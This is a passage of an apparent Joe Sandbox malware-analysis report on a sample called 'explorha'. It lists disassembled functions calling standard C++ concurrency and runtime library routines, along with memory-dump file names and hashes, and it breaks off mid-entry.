                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1423051803-0
                                                                                                      • Opcode ID: 14f05714d2c0e50e35e9ecdc354575af1fefea5ccb7e1f8904cb20a2fb005826
                                                                                                      • Instruction ID: b2c291f3c46c286b333b21ed192afa51e83fc622aa6e4d644995bb70cfa9beb1
                                                                                                      • Opcode Fuzzy Hash: 14f05714d2c0e50e35e9ecdc354575af1fefea5ccb7e1f8904cb20a2fb005826
                                                                                                      • Instruction Fuzzy Hash: 6C510172500216ABFF205F68CC81EAB3AA9FF86710F1D4128FD05EA644FB71CC2196A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088FF6D Relevance: 7.6, APIs: 5, Instructions: 117COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 0088FFAE
                                                                                                      • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0088FFB6
                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0088FFE0
                                                                                                      • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0088FFE9
                                                                                                      • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0089006C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 512098550-0
                                                                                                      • Opcode ID: 3e1660006fa218debb77f8dea5181aad01e89ca209321f341ffbf23000c64a13
                                                                                                      • Instruction ID: a6a5c6acc84248d20c445310c6160325cae872b2181447c1753a1852bb1d2f1d
                                                                                                      • Opcode Fuzzy Hash: 3e1660006fa218debb77f8dea5181aad01e89ca209321f341ffbf23000c64a13
                                                                                                      • Instruction Fuzzy Hash: 58413A35A00619AFCF09EF68C554A6DB7B5FF88310F148169E906EB391CB74AE01CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00880376 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 0088037D
                                                                                                      • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 008803A7
                                                                                                        • Part of subcall function 00880A6D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00880A8A
                                                                                                      • __alloca_probe_16.LIBCMT ref: 008803E3
                                                                                                      • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00880424
                                                                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00880456
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
                                                                                                      • String ID:
                                                                                                      • API String ID: 2568206803-0
                                                                                                      • Opcode ID: 63b52478e97fcc797c4b016af217516f9f6319b8b146a122e1e4b563afa1a143
                                                                                                      • Instruction ID: c1090938701612503e42bb62236aa31ab9daeeece76c817485769eb310bef3b5
                                                                                                      • Opcode Fuzzy Hash: 63b52478e97fcc797c4b016af217516f9f6319b8b146a122e1e4b563afa1a143
                                                                                                      • Instruction Fuzzy Hash: FC317E71A002168BCB55EFA8C8415AEB7F4FF49314B244069E645F7341DB34DE4ACFA6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088E949 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0088E9D4
                                                                                                      • ListArray.LIBCONCRT ref: 0088E9F7
                                                                                                      • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0088EA00
                                                                                                      • ListArray.LIBCONCRT ref: 0088EA38
                                                                                                      • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0088EA43
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                      • String ID:
                                                                                                      • API String ID: 4212520697-0
                                                                                                      • Opcode ID: 6720b31db85e61357b1692a598ecd5b3b1e05c1bb267552f9d8e580b64321404
                                                                                                      • Instruction ID: bcc5ae1ce4973508f77ad50b5a42b518d00800fb1d94f819c8649e5adad4149f
                                                                                                      • Opcode Fuzzy Hash: 6720b31db85e61357b1692a598ecd5b3b1e05c1bb267552f9d8e580b64321404
                                                                                                      • Instruction Fuzzy Hash: 4D318175700210AFDB19EF58C880BADBBA6FF89700F150099E806DB352DB70ED41CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00889D59 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _SpinWait.LIBCONCRT ref: 00889D7E
                                                                                                        • Part of subcall function 00880160: _SpinWait.LIBCONCRT ref: 00880178
                                                                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00889D92
                                                                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00889DC4
                                                                                                      • List.LIBCMT ref: 00889E47
                                                                                                      • List.LIBCMT ref: 00889E56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                      • String ID:
                                                                                                      • API String ID: 3281396844-0
                                                                                                      • Opcode ID: 1351bd237f9a62e0404815f7e63a109d74f97c502a9932a579afc39cc3c2fd6c
                                                                                                      • Instruction ID: fd708bc67b56bd68b758fb4f19aca5470ac647d297eed587867b2ea2a5e9ded6
